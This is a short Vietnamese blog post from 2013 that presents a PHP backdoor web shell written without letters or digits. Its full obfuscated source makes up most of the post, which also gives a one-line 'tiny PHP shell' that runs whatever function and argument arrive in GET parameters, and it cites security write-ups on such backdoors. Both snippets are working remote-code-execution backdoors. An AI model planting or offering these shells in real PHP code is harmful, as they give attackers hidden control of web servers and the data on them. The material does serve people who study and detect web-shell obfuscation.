Wednesday, September 18, 2013

PHP Shell backdoor không có kí tự chữ và số

<?php
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
?>

Tham khảo thêm tại
http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/
Bắt nguồn từ đây:
http://blog.omfgitsasalmon.com/

Con shell này là biến dị khởi nguồn từ con Shell được gọi là The most tiny php shell
Được tác giả của nó đăng lên twitter tại https://twitter.com/dragosr/status/116759108526415872 vào năm 2011

<?=($_=@$_GET[2]).@$_($_GET[1])?>